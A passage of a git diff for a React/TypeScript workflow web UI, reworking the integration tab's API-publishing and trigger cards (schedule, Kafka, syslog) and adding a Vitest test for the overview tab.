+                      <CapabilityTypePill>API</CapabilityTypePill>
+                      <EnabledStatusPill active={service.status !== 'stopped'} />
+                    </div>
+                  </button>
+                  <div className={CARD_ACTION_GRID_CLASS}>
+                    {renderConfigButton()}
+                    {service.status === 'stopped' ? (
+                      <button
+                        type="button"
+                        onClick={handlePublish}
+                        disabled={publishing || deleting}
+                        className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                      >
+                        <Play className="h-3.5 w-3.5" />
+                        {publishing ? t('detail.run.publishing') : '启用'}
+                      </button>
+                    ) : (
+                      <button
+                        type="button"
+                        onClick={handleUnpublish}
+                        disabled={stopping || deleting}
+                        className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                      >
+                        <Square className="h-3.5 w-3.5" />
+                        {stopping ? t('detail.run.stopping') : '停用'}
+                      </button>
+                    )}
+                    {renderDeleteButton()}
                   </div>
                 </div>
-                <div>
-                  <div className="text-xs text-gray-500 mb-1">API Key</div>
-                  <div className="flex items-center gap-2 rounded-lg bg-white border border-gray-200 px-2 py-2">
-                    <span className="min-w-0 flex-1 truncate font-mono text-xs text-gray-700">
-                      {maskedValue(service.apiKey, apiKeyVisible)}
-                    </span>
-                    <button
-                      type="button"
-                      onClick={() => setApiKeyVisible((v) => !v)}
-                      className="text-xs text-red-500 hover:text-red-700"
-                    >
-                      {apiKeyVisible ? t('detail.run.apiKeyHide') : t('detail.run.apiKeyShow')}
-                    </button>
-                    <CopyButton text={service.apiKey ?? ''} />
+                {configExpanded ? (
+                  <div data-testid="api-publish-config" className="space-y-4 border-t border-gray-100 px-4 pb-4 pt-4">
+                    {renderDriverSelector({ showApply: true })}
+                    <CardGuidePanel action={apiGuideAction} onGuidePrompt={onGuidePrompt} />
+                    <div>
+                      <div className="mb-2 text-xs font-medium text-zinc-500">Invoke URL</div>
+                      <div className="flex min-h-10 items-center gap-2 rounded-lg border border-gray-300 bg-white px-3.5 py-2">
+                        <span className="min-w-0 flex-1 truncate font-mono text-xs text-zinc-700">{service.invokeUrl}</span>
+                        <CopyButton text={service.invokeUrl ?? ''} />
+                      </div>
+                    </div>
+                    <div>
+                      <div className="mb-2 text-xs font-medium text-zinc-500">API Key</div>
+                      <div className="flex min-h-10 items-center gap-2 rounded-lg border border-gray-300 bg-white px-3.5 py-2">
+                        <span className="min-w-0 flex-1 truncate font-mono text-xs text-zinc-700">
+                          {maskedValue(service.apiKey, apiKeyVisible)}
+                        </span>
+                        <button
+                          type="button"
+                          onClick={() => setApiKeyVisible((v) => !v)}
+                          className="text-xs font-medium text-red-500 hover:text-red-700"
+                        >
+                          {apiKeyVisible ? t('detail.run.apiKeyHide') : t('detail.run.apiKeyShow')}
+                        </button>
+                        <CopyButton text={service.apiKey ?? ''} />
+                      </div>
+                    </div>
                   </div>
-                </div>
+                ) : null}
               </div>
-              <button
-                type="button"
-                onClick={handleUnpublish}
-                disabled={stopping}
-                className="w-full rounded-lg border border-red-200 px-3 py-2 text-xs font-medium text-red-600 hover:bg-red-50 disabled:opacity-60"
-              >
-                {stopping ? t('detail.run.stopping') : t('detail.run.stopService')}
-              </button>
             </div>
           ) : (
             <div className="space-y-3">
-              <p className="text-xs text-gray-500">{t('detail.run.publishDesc')}</p>
-              <div className="grid grid-cols-2 gap-2">
-                {(['local', 'docker'] as WorkflowServiceDriver[]).map((item) => (
+              <div
+                data-testid="api-publish-card"
+                className={`rounded-xl border bg-white transition-colors ${
+                  configExpanded
+                    ? 'border-gray-300'
+                    : 'border-gray-200 hover:bg-gray-50'
+                }`}
+              >
+                <div className="grid grid-cols-1 items-center gap-4 px-4 py-4 sm:grid-cols-[minmax(0,1fr)_276px]">
                   <button
-                    key={item}
                     type="button"
-                    onClick={() => setDriver(item)}
-                    className={`rounded-lg border px-3 py-2 text-left text-xs ${
-                      driver === item ? 'border-red-400 bg-red-50 text-red-700' : 'border-gray-200 hover:bg-gray-50 text-gray-600'
-                    }`}
+                    onClick={() => setConfigExpanded((value) => !value)}
+                    className="flex min-h-[82px] min-w-0 flex-col justify-between text-left"
                   >
-                    <div className="font-semibold">
-                      {item === 'local' ? t('detail.run.driverLocal') : t('detail.run.driverDocker')}
+                    <div>
+                      <div className="truncate text-sm font-semibold text-gray-900">API 服务</div>
+                      <div className="mt-1 truncate text-[11px] text-gray-500">{t('detail.run.publishDesc')}</div>
+                      <div className="mt-1 truncate text-[11px] text-gray-400">ID: api-service</div>
                     </div>
-                    <div className="mt-1 text-[11px] text-gray-500">
-                      {item === 'local' ? t('detail.run.driverLocalDesc') : t('detail.run.driverDockerDesc')}
+                    <div className="mt-3 flex flex-wrap items-center gap-2">
+                      <CapabilityTypePill>API</CapabilityTypePill>
+                      <EnabledStatusPill active={false} />
                     </div>
                   </button>
-                ))}
+                  <div className={CARD_ACTION_GRID_CLASS}>
+                    {renderConfigButton()}
+                    <button
+                      type="button"
+                      onClick={handlePublish}
+                      disabled={publishing}
+                      className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                    >
+                      <Rocket className="h-3.5 w-3.5" />
+                      {publishing ? t('detail.run.publishing') : '发布'}
+                    </button>
+                  </div>
+                </div>
+                {configExpanded ? (
+                  <div data-testid="api-publish-config" className="space-y-4 border-t border-gray-100 px-4 pb-4 pt-4">
+                    <CardGuidePanel action={apiGuideAction} onGuidePrompt={onGuidePrompt} />
+                    {renderDriverSelector()}
+                  </div>
+                ) : null}
               </div>
-              <button
-                type="button"
-                onClick={handlePublish}
-                disabled={publishing}
-                className="w-full rounded-lg bg-green-600 px-3 py-2 text-xs font-medium text-white hover:bg-green-700 disabled:opacity-60"
-              >
-                {publishing ? t('detail.run.publishing') : t('detail.run.publishAsApi')}
-              </button>
             </div>
           )}
           {error ? (
@@ -454,11 +1271,14 @@ function PublishSection({ workflowId }: { workflowId: string }) {
 }
 
 function TriggerEditor({
+  workflow,
   workflowId,
   draft,
   status,
   plugins,
   showIdentityHeader,
+  embedded = false,
+  onGuidePrompt,
   saving,
   deleting,
   error,
@@ -468,11 +1288,14 @@ function TriggerEditor({
   onSave,
   onRunOnce,
 }: {
+  workflow: Workflow;
   workflowId: string;
   draft: WorkflowTrigger | null;
   status?: JsonObject;
   plugins: WorkflowTriggerPlugin[];
   showIdentityHeader: boolean;
+  embedded?: boolean;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
   saving: boolean;
   deleting: boolean;
   error: string;
@@ -482,6 +1305,7 @@ function TriggerEditor({
   onSave: (next: WorkflowTrigger) => Promise<WorkflowTrigger | null> | void;
   onRunOnce?: () => Promise<void>;
 }) {
+  const { t } = useTranslation('workflow');
   const [inputsText, setInputsText] = useState(DEFAULT_JSON_TEXT);
   const [jsonError, setJsonError] = useState('');
   const [runningOnce, setRunningOnce] = useState(false);
@@ -573,8 +1397,10 @@ function TriggerEditor({
     return savedTrigger ?? nextDraft;
   };
 
+  const triggerGuideAction = buildTriggerCardGuideAction(t, workflow, draft, status, inputsText);
+
   return (
-    <div className="rounded-xl border border-gray-200 bg-white p-4 space-y-4">
+    <div className={embedded ? 'border-t border-gray-100 px-3 pb-3 pt-4 space-y-4' : 'rounded-xl border border-gray-200 bg-white p-4 space-y-4'}>
       {showIdentityHeader ? (
         <div className="flex items-start justify-between gap-3">
           <div className="min-w-0">
@@ -612,70 +1438,19 @@ function TriggerEditor({
         </div>
       )}
 
+      <CardGuidePanel action={triggerGuideAction} onGuidePrompt={onGuidePrompt} />
+
       <Field label="名称">
         <Input value={draft.name ?? ''} onChange={(e) => updateDraft({ name: e.target.value })} />
       </Field>
 
       {isSchedule ? (
-        <div className="grid grid-cols-1 gap-3">
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="调度模式">
-              <Select
-                value={String(source.mode ?? (source.cron ? 'cron' : 'interval'))}
-                onChange={(e) => {
-                  const nextMode = e.target.value;
-                  if (nextMode === 'cron') {
-                    updateSource({
-                      mode: nextMode,
-                      cron: String(source.cron ?? '*/5 * * * *'),
-                      intervalSeconds: undefined,
-                    });
-                    return;
-                  }
-                  updateSource({
-                    mode: nextMode,
-                    intervalSeconds: Math.max(1, Number.parseInt(String(source.intervalSeconds ?? 300), 10)),
-                    cron: undefined,
-                  });
-                }}
-              >
-                <option value="interval">Interval</option>
-                <option value="cron">Cron</option>
-              </Select>
-            </Field>
-            <Field label="执行超时（秒）">
-              <Input
-                type="number"
-                min={1}
-                value={String(runtime.timeoutSeconds ?? 7200)}
-                onChange={(e) => updateRuntime({ timeoutSeconds: Math.max(1, Number.parseInt(e.target.value || '7200', 10)) })}
-              />
-            </Field>
-          </div>
-          {(source.mode ?? (source.cron ? 'cron' : 'interval')) === 'cron' ? (
-            <Field label="Cron 表达式">
-              <Input value={String(source.cron ?? '')} onChange={(e) => updateSource({ cron: e.target.value })} placeholder="*/5 * * * *" />
-            </Field>
-          ) : (
-            <Field label="轮询间隔（秒）">
-              <Input
-                type="number"
-                min={1}
-                value={String(source.intervalSeconds ?? 300)}
-                onChange={(e) => updateSource({ intervalSeconds: Math.max(1, Number.parseInt(e.target.value || '300', 10)) })}
-              />
-            </Field>
-          )}
-          <label className="flex items-center gap-2 text-xs text-gray-600">
-            <input
-              type="checkbox"
-              checked={Boolean(runtime.noOverlap ?? true)}
-              onChange={(e) => updateRuntime({ noOverlap: e.target.checked })}
-              className="rounded border-gray-300 text-red-600 focus:ring-red-500"
-            />
-            禁止重叠执行
-          </label>
-        </div>
+        <ScheduleTriggerFields
+          source={source}
+          runtime={runtime}
+          onSourceChange={updateSource}
+          onRuntimeChange={updateRuntime}
+        />
       ) : null}
 
       {isWebhook ? (
@@ -725,66 +1500,21 @@ function TriggerEditor({
       ) : null}
 
       {isKafka ? (
-        <div className="grid grid-cols-1 gap-3">
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="Broker">
-              <Input value={String(source.inputBroker ?? '')} onChange={(e) => updateSource({ inputBroker: e.target.value })} />
-            </Field>
-            <Field label="Topic">
-              <Input value={String(source.inputTopic ?? '')} onChange={(e) => updateSource({ inputTopic: e.target.value })} />
-            </Field>
-          </div>
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="Group ID">
-              <Input value={String(source.inputGroupId ?? '')} onChange={(e) => updateSource({ inputGroupId: e.target.value })} />
-            </Field>
-            <Field label="Input Key">
-              <Input value={inputKey} onChange={(e) => onChange(setTriggerInputKey(draft, e.target.value || 'kafka_message'))} />
-            </Field>
-          </div>
-          <Field label="Offset Reset">
-            <Select value={String(source.autoOffsetReset ?? 'latest')} onChange={(e) => updateSource({ autoOffsetReset: e.target.value })}>
-              <option value="latest">latest</option>
-              <option value="earliest">earliest</option>
-            </Select>
-          </Field>
-        </div>
+        <KafkaTriggerFields
+          source={source}
+          inputKey={inputKey}
+          onSourceChange={updateSource}
+          onInputKeyChange={(key) => onChange(setTriggerInputKey(draft, key))}
+        />
       ) : null}
 
       {isSyslog ? (
-        <div className="grid grid-cols-1 gap-3">
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="协议">
-              <Select value={String(source.protocol ?? 'udp')} onChange={(e) => updateSource({ protocol: e.target.value })}>
-                <option value="udp">UDP</option>
-                <option value="tcp">TCP</option>
-              </Select>
-            </Field>
-            <Field label="格式">
-              <Select value={String(source.format ?? 'auto')} onChange={(e) => updateSource({ format: e.target.value })}>
-                <option value="auto">auto</option>
-                <option value="rfc3164">rfc3164</option>
-                <option value="rfc5424">rfc5424</option>
-              </Select>
-            </Field>
-          </div>
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="Host">
-              <Input value={String(source.host ?? '0.0.0.0')} onChange={(e) => updateSource({ host: e.target.value })} />
-            </Field>
-            <Field label="Port">
-              <Input
-                type="number"
-                min={1}
-                value={String(source.port ?? 5140)}
-                onChange={(e) => updateSource({ port: Math.max(1, Number.parseInt(e.target.value || '5140', 10)) })}
-              />
-            </Field>
-          </div>
-          <Field label="Input Key">
-            <Input value={inputKey} onChange={(e) => onChange(setTriggerInputKey(draft, e.target.value || 'syslog_message'))} />
-          </Field>
-        </div>
+        <SyslogTriggerFields
+          source={source}
+          inputKey={inputKey}
+          onSourceChange={updateSource}
+          onInputKeyChange={(key) => onChange(setTriggerInputKey(draft, key))}
+        />
       ) : null}
 
       {isAdapter ? (
@@ -878,10 +1608,13 @@ function TriggerEditor({
 function TriggersSection({
   workflow,
   onWorkflowUpdated,
+  onGuidePrompt,
 }: {
   workflow: Workflow;
   onWorkflowUpdated?: (updated: Workflow) => void;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
 }) {
+  const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
   const [loading, setLoading] = useState(false);
   const [records, setRecords] = useState<WorkflowTriggerRecord[]>([]);
@@ -924,9 +1657,9 @@ function TriggersSection({
       setRecords(nextRecords);
       setPlugins(pluginRes.data ?? []);
 
-      const nextSelectedId: string | null = nextRecords.some((item) => item.trigger.id === preferredId)
-        ? (preferredId ?? null)
-        : nextRecords[0]?.trigger.id ?? null;
+      const nextSelectedId: string | null = preferredId && nextRecords.some((item) => item.trigger.id === preferredId)
+        ? preferredId
+        : null;
       setSelectedTriggerId(nextSelectedId);
       if (syncDraft) {
         const selected = nextRecords.find((item) => item.trigger.id === nextSelectedId)?.trigger ?? null;
@@ -963,9 +1696,7 @@ function TriggersSection({
     void refresh({ preferredId: null, syncDraft: true });
   }, [refresh]);
 
-  const selectedRecord = records.find((item) => item.trigger.id === selectedTriggerId) ?? null;
-
-  const selectTrigger = (triggerId: string) => {
+  const openTriggerConfig = (triggerId: string) => {
     if (!confirmDiscardIfDirty('当前 Trigger 有未保存修改，确认切换并放弃这些改动吗？')) {
       return;
     }
@@ -978,6 +1709,22 @@ function TriggersSection({
     setDirty(false);
   };
 
+  // Collapse the trigger's editor if it is the selected one (aborting when confirmDiscardIfDirty returns falsy); otherwise open it.
+  const toggleTriggerConfig = (triggerId: string) => {
+    if (selectedTriggerId !== triggerId) {
+      openTriggerConfig(triggerId);
+      return;
+    }
+    const discardConfirmed = confirmDiscardIfDirty('当前 Trigger 有未保存修改，确认收起并放弃这些改动吗？');
+    if (!discardConfirmed) return;
+    setSelectedTriggerId(null);
+    setDraft(null);
+    setError('');
+    setSuccess('');
+    setHint('');
+    setDirty(false);
+  };
+
   const createTrigger = async (type: WorkflowTriggerType) => {
     if (!workflowAPI.createTrigger) return;
     const disabledReason = getCreateDisabledReason(type);
@@ -1025,8 +1772,11 @@ function TriggersSection({
         enabled: !trigger.enabled,
       });
       setSuccess(!trigger.enabled ? 'Trigger 已启用' : 'Trigger 已停用');
+      const keepSelectedId = selectedTriggerId && records.some((item) => item.trigger.id === selectedTriggerId)
+        ? selectedTriggerId
+        : null;
       await Promise.all([
-        refresh({ preferredId: trigger.id, syncDraft: selectedTriggerId === trigger.id }),
+        refresh({ preferredId: keepSelectedId, syncDraft: selectedTriggerId === trigger.id }),
         syncWorkflowFromServer(),
       ]);
       if (selectedTriggerId === trigger.id && draft) {
@@ -1126,7 +1876,7 @@ function TriggersSection({
   return (
     <div className="border-b border-gray-100">
       <SectionHeader
-        title="集成"
+        title={t('detail.run.triggerSection')}
         expanded={expanded}
         onToggle={() => setExpanded((v) => !v)}
         badge={<span className="text-xs font-normal text-gray-500">{records.length} 个</span>}
@@ -1195,70 +1945,102 @@ function TriggersSection({
             </div>
           ) : (
             <>
-              {records.length > 1 ? (
+              {records.length > 0 ? (
                 <div className="space-y-2">
-                  {records.map(({ trigger, status }) => (
-                    <button
-                      key={trigger.id}
-                      type="button"
-                      onClick={() => selectTrigger(trigger.id)}
-                      className={`w-full rounded-xl border px-3 py-3 text-left transition-colors ${
-                        selectedTriggerId === trigger.id
-                          ? 'border-red-300 bg-red-50/40'
-                          : 'border-gray-200 hover:bg-gray-50'
-                      }`}
-                    >
-                      <div className="flex items-start justify-between gap-3">
-                        <div className="min-w-0 flex-1">
-                          <div className="flex items-center gap-2">
-                            <span className="truncate text-sm font-semibold text-gray-900">{trigger.name || trigger.id}</span>
-                            <span className="rounded-full bg-gray-100 px-2 py-0.5 text-[11px] text-gray-600">
-                              {triggerTypeLabel(trigger.type)}
-                            </span>
-                          </div>
-                          <div className="mt-1 truncate text-[11px] text-gray-500">{triggerSourceLabel(trigger)}</div>
-                          <div className="mt-1 truncate text-[11px] text-gray-400">ID: {trigger.id}</div>
-                          <div className="mt-2 flex flex-wrap items-center gap-2 text-[11px] text-gray-500">
-                            <span>{String(status?.state || (trigger.enabled ? 'ready' : 'stopped'))}</span>
-                            {status?.error ? <span className="text-red-600">{String(status.error)}</span> : null}
-                          </div>
-                        </div>
-                        <div className="flex items-start gap-2">
-                          <span className={`mt-0.5 inline-flex h-5 items-center rounded-full px-2 text-[11px] font-medium ${
-                            trigger.enabled ? 'bg-green-100 text-green-700' : 'bg-gray-100 text-gray-500'
-                          }`}>
-                            {trigger.enabled ? '启用' : '停用'}
-                          </span>
+                  {records.map(({ trigger, status }) => {
+                    const isSelected = selectedTriggerId === trigger.id;
+                    return (
+                      <div
+                        key={trigger.id}
+                        data-testid={`trigger-card-${trigger.id}`}
+                        className={`rounded-xl border bg-white transition-colors ${
+                          isSelected
+                            ? 'border-gray-300'
+                            : 'border-gray-200 hover:bg-gray-50'
+                        }`}
+                      >
+                        <div className="grid grid-cols-1 items-center gap-4 px-4 py-4 sm:grid-cols-[minmax(0,1fr)_276px]">
                           <button
                             type="button"
-                            onClick={(event) => {
-                              event.preventDefault();
-                              event.stopPropagation();
-                              void toggleTriggerEnabled(trigger);
-                            }}
-                            disabled={saving}
-                            className="inline-flex items-center gap-1 rounded-lg border border-gray-200 px-2 py-1 text-[11px] font-medium text-gray-700 hover:bg-white disabled:opacity-60"
+                            onClick={() => toggleTriggerConfig(trigger.id)}
+                            className="flex min-h-[82px] min-w-0 flex-col justify-between text-left"
                           >
-                            {trigger.enabled ? '停用' : '启用'}
+                            <div>
+                              <div className="truncate text-sm font-semibold text-gray-900">{trigger.name || trigger.id}</div>
+                              <div className="mt-1 truncate text-[11px] text-gray-500">{triggerSourceLabel(trigger)}</div>
+                              <div className="mt-1 truncate text-[11px] text-gray-400">ID: {trigger.id}</div>
+                            </div>
+                            <div className="mt-3 flex flex-wrap items-center gap-2">
+                              <CapabilityTypePill>{triggerTypeLabel(trigger.type)}</CapabilityTypePill>
+                              <EnabledStatusPill active={!!trigger.enabled} />
+                              {status?.error ? <span className="text-red-600">{String(status.error)}</span> : null}
+                            </div>
                           </button>
-                          <button
-                            type="button"
-                            aria-label={`删除 ${trigger.name || trigger.id}`}
-                            onClick={(event) => {
-                              event.preventDefault();
-                              event.stopPropagation();
+                          <div className={CARD_ACTION_GRID_CLASS}>
+                            <button
+                              type="button"
+                              onClick={() => toggleTriggerConfig(trigger.id)}
+                              aria-expanded={isSelected}
+                              className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                            >
+                              {isSelected ? <ChevronDown className="h-3.5 w-3.5" /> : <ChevronRight className="h-3.5 w-3.5" />}
+                              配置
+                            </button>
+                            <button
+                              type="button"
+                              onClick={() => {
+                                void toggleTriggerEnabled(trigger);
+                              }}
+                              disabled={saving}
+                              className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                            >
+                              {trigger.enabled ? <Square className="h-3.5 w-3.5" /> : <Play className="h-3.5 w-3.5" />}
+                              {trigger.enabled ? '停用' : '启用'}
+                            </button>
+                            <button
+                              type="button"
+                              aria-label={`删除 ${trigger.name || trigger.id}`}
+                              onClick={() => {
+                                void handleDeleteTrigger(trigger.id, trigger.name || trigger.id);
+                              }}
+                              disabled={deleting}
+                              className={CARD_ACTION_DANGER_BUTTON_CLASS}
+                            >
+                              <Trash2 className="h-3.5 w-3.5" />
+                              删除
+                            </button>
+                          </div>
+                        </div>
+                        {isSelected ? (
+                          <TriggerEditor
+                            workflow={workflow}
+                            workflowId={workflow.id}
+                            draft={draft}
+                            status={status as JsonObject | undefined}
+                            plugins={plugins}
+                            showIdentityHeader={false}
+                            embedded
+                            onGuidePrompt={onGuidePrompt}
+                            saving={saving}
+                            deleting={deleting}
+                            error={error}
+                            success={success}
+                            onChange={(next) => {
+                              setDraft(next);
+                              setDirty(true);
+                              setError('');
+                              setSuccess('');
+                            }}
+                            onDelete={() => {
                               void handleDeleteTrigger(trigger.id, trigger.name || trigger.id);
                             }}
-                            disabled={deleting}
-                            className="inline-flex items-center gap-1 rounded-lg border border-red-200 px-2 py-1 text-[11px] font-medium text-red-600 hover:bg-red-50 disabled:opacity-60"
-                          >
-                            <Trash2 className="w-3 h-3" />
-                            删除
-                          </button>
-                        </div>
+                            onSave={persistDraft}
+                            onRunOnce={draft?.type === 'schedule' ? runScheduleOnce : undefined}
+                          />
+                        ) : null}
                       </div>
-                    </button>
-                  ))}
+                    );
+                  })}
                 </div>
               ) : records.length === 0 ? (
                 <div className="rounded-xl border border-dashed border-gray-200 px-4 py-8 text-center text-xs text-gray-500">
@@ -1266,30 +2048,6 @@ function TriggersSection({
                 </div>
               ) : null}
 
-              {records.length > 0 ? (
-                <TriggerEditor
-                  workflowId={workflow.id}
-                  draft={draft}
-                  status={selectedRecord?.status as JsonObject | undefined}
-                  plugins={plugins}
-                  showIdentityHeader={records.length === 1}
-                  saving={saving}
-                  deleting={deleting}
-                  error={error}
-                  success={success}
-                  onChange={(next) => {
-                    setDraft(next);
-                    setDirty(true);
-                    setError('');
-                    setSuccess('');
-                  }}
-                  onDelete={() => {
-                    void handleDelete();
-                  }}
-                  onSave={persistDraft}
-                  onRunOnce={draft?.type === 'schedule' ? runScheduleOnce : undefined}
-                />
-              ) : null}
             </>
           )}
         </div>
@@ -1298,11 +2056,70 @@ function TriggersSection({
   );
 }
 
-export default function IntegrationTab({ workflow, onWorkflowUpdated }: IntegrationTabProps) {
+export default function IntegrationTab({ workflow, onWorkflowUpdated, onGuidePrompt }: IntegrationTabProps) { // Fetches the workflow's publish config, then renders the optional guide panel plus the publish and trigger sections.
+  const { t } = useTranslation('workflow');
+  const [config, setConfig] = useState<WorkflowIntegrationConfig | null>(null);
+  const [loadingConfig, setLoadingConfig] = useState(true);
+  const [configError, setConfigError] = useState('');
+
+  useEffect(() => {
+    let cancelled = false; // flipped by the cleanup below so a superseded request cannot touch state
+    setLoadingConfig(true);
+    setConfigError('');
+    void workflowAPI.getConfig(workflow.id)
+      .then((response) => {
+        if (cancelled) return;
+        setConfig(response.data.config ?? null);
+      })
+      .catch((err: unknown) => {
+        if (cancelled) return;
+        setConfig(null); // on failure the view below is built from a null config
+        setConfigError(extractErrorMessage(err, '加载发布配置失败'));
+      })
+      .finally(() => {
+        if (!cancelled) {
+          setLoadingConfig(false);
+        }
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, [workflow.id]); // re-run whenever a different workflow id is shown
+
+  if (loadingConfig) { // early return: only the spinner renders until the request settles
+    return (
+      <div className="flex-1 min-h-0 overflow-y-auto">
+        <div className="p-4 flex items-center gap-2 text-xs text-gray-500">
+          <Loader2 className="w-3.5 h-3.5 animate-spin" />
+          正在读取发布配置...
+        </div>
+      </div>
+    );
+  }
+
+  const view = buildTemplateView(config);
+  const guideActions = buildPublishGuideActions(t, workflow, view);
+  const showGuide = Boolean(onGuidePrompt && guideActions.length > 0); // needs both a handler and at least one action
+
   return (
     <div className="flex-1 min-h-0 overflow-y-auto divide-y divide-gray-100">
-      <PublishSection workflowId={workflow.id} />
-      <TriggersSection workflow={workflow} onWorkflowUpdated={onWorkflowUpdated} />
+      {configError ? (
+        <div className="flex items-start gap-1.5 bg-red-50 px-4 py-3 text-xs text-red-600">
+          <AlertCircle className="w-3.5 h-3.5 mt-0.5 flex-shrink-0" />
+          <span>{configError}</span>
+        </div>
+      ) : null}
+      {showGuide ? (
+        <div className="p-4">
+          <PublishGuidePanel actions={guideActions} onGuidePrompt={onGuidePrompt} />
+        </div>
+      ) : null}
+      <PublishSection workflow={workflow} workflowId={workflow.id} onGuidePrompt={onGuidePrompt} />
+      <TriggersSection
+        workflow={workflow}
+        onWorkflowUpdated={onWorkflowUpdated}
+        onGuidePrompt={onGuidePrompt}
+      />
     </div>
   );
 }
diff --git a/webui/src/pages/WorkflowDetail/tabs/OverviewTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.test.tsx
new file mode 100644
index 000000000..6e559e508
--- /dev/null
+++ b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.test.tsx
@@ -0,0 +1,112 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import OverviewTab from './OverviewTab';
+
+vi.mock('react-i18next', () => ({ // Stub i18n so assertions can match fixed zh-CN strings
+  useTranslation: () => ({
+    i18n: { language: 'zh-CN' },
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'detail.overview.configInfo': '信息',
+        'detail.overview.nodeCount': '节点数',
+        'detail.overview.nodesAndEdges': `${params?.nodes ?? 0} 个节点 / ${params?.edges ?? 0} 条边`,
+        'detail.overview.category': '分类',
+        'detail.overview.version': '版本',
+        'detail.overview.createdBy': '创建人',
+        'detail.overview.createdAt': '创建时间',
+        'detail.overview.updatedAt': '更新时间',
+        'detail.overview.workflowFiles': '工作流文件',
+        'detail.overview.run': '运行',
+        'detail.overview.runStats': '运行统计',
+        'detail.overview.totalCalls': '总调用次数',
+        'detail.overview.successRate': '成功率',
+        'detail.overview.avgRuntime': '平均耗时',
+        'detail.overview.errorCount': '失败次数',
+        'detail.overview.successTimes': `成功 ${params?.count ?? 0} 次`,
+        'detail.overview.errorTimes': `失败 ${params?.count ?? 0} 次`,
+        'detail.run.testSection': '测试运行',
+        'detail.run.historySection': '执行历史',
+      };
+      return translations[key] ?? key; // keys missing from the table are returned unchanged
+    },
+  }),
+}));
+
+vi.mock('./RunTab', () => ({ // Replace RunTab with a marker element exposing the received flags as data-* attributes
+  default: ({
+    embedded,
+    embeddedTabs,
+    hideSectionHeaders,
+  }: {
+    embedded?: boolean;
+    embeddedTabs?: boolean;
+    hideSectionHeaders?: boolean;
+  }) => (
+    <div
+      data-testid="embedded-run-tab"
+      data-embedded={String(Boolean(embedded))}
+      data-embedded-tabs={String(Boolean(embeddedTabs))}
+      data-hide-section-headers={String(Boolean(hideSectionHeaders))}
+    >
+      run tab
+    </div>
+  ),
+}));
+
+function makeWorkflow() { // Builds the workflow fixture rendered by the test below
+  return {
+    id: 'wf-1',
+    name: '测试工作流',
+    category: 'default',
+    status: 'draft' as const,
+    createdAt: 0,
+    updatedAt: 0,
+    stats: { // 3 calls: 2 succeeded, 1 failed -> asserted as "66.7%" in the run summary
+      callCount: 3,
+      successCount: 2,
+      errorCount: 1,
+      totalRuntime: 6,
+      avgRuntime: 2,
+      thumbsUp: 0,
+      thumbsDown: 0,
+    },
+    workflowJson: { // one node, no edges -> asserted as "1 个节点 / 0 条边"
+      start: 'node-1',
+      version: '1.0',
+      nodes: [{ id: 'node-1', type: 'start' }],
+      edges: [],
+    },
+  };
+}
+
+describe('OverviewTab', () => {
+  it('在概览内以可折叠区块承载信息和运行', async () => { // title: "hosts info and run as collapsible blocks inside the overview"
+    const user = userEvent.setup();
+
+    render(<OverviewTab workflow={makeWorkflow()} />);
+
+    expect(screen.getByRole('button', { name: '信息 1 个节点 / 0 条边' })).toBeInTheDocument(); // both sections start expanded
+    expect(screen.getByRole('button', { name: '运行 总调用次数 3 / 成功率 66.7% / 平均耗时 2.00s' })).toBeInTheDocument();
+    expect(screen.getByText('分类')).toBeInTheDocument();
+    expect(screen.getByText('.flocks/plugins/workflows/wf-1/workflow.json')).toBeInTheDocument();
+    expect(screen.getByText('.flocks/plugins/workflows/wf-1/workflow.md')).toBeInTheDocument();
+    expect(screen.getByText('运行统计')).toBeInTheDocument();
+
+    const runTab = screen.getByTestId('embedded-run-tab'); // the mocked RunTab defined above
+    expect(runTab).toHaveAttribute('data-embedded', 'true');
+    expect(runTab).toHaveAttribute('data-embedded-tabs', 'true');
+    expect(runTab).toHaveAttribute('data-hide-section-headers', 'true');
+
+    await user.click(screen.getByRole('button', { name: '运行 总调用次数 3 / 成功率 66.7% / 平均耗时 2.00s' })); // collapse the run section
+    expect(screen.queryByTestId('embedded-run-tab')).not.toBeInTheDocument();
+    expect(screen.queryByText('运行统计')).not.toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '信息 1 个节点 / 0 条边' })); // collapse the info section
+    expect(screen.queryByText('分类')).not.toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '运行 总调用次数 3 / 成功率 66.7% / 平均耗时 2.00s' })); // expand the run section again
+    expect(screen.getByText('运行统计')).toBeInTheDocument();
+  });
+});
diff --git a/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx
index 56a9b7b4d..eb6c7c786 100644
--- a/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/OverviewTab.tsx
@@ -1,14 +1,19 @@
+import { useState, type ReactNode } from 'react';
 import { useTranslation } from 'react-i18next';
-import { Workflow } from '@/api/workflow';
-import { Calendar, User, Tag, Activity, Clock, CheckCircle, XCircle, Layers } from 'lucide-react';
+import { Workflow, WorkflowExecution } from '@/api/workflow';
+import { Calendar, User, Tag, Activity, Clock, CheckCircle, XCircle, Layers, ChevronDown, ChevronRight, FileText } from 'lucide-react';
+import RunTab from './RunTab';
 
 interface OverviewTabProps {
   workflow: Workflow;
+  latestExecution?: WorkflowExecution | null;
+  onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
+  onExecutionSettled?: () => void;
 }
 
-function MetaRow({ icon, label, value }: { icon: React.ReactNode; label: string; value: React.ReactNode }) {
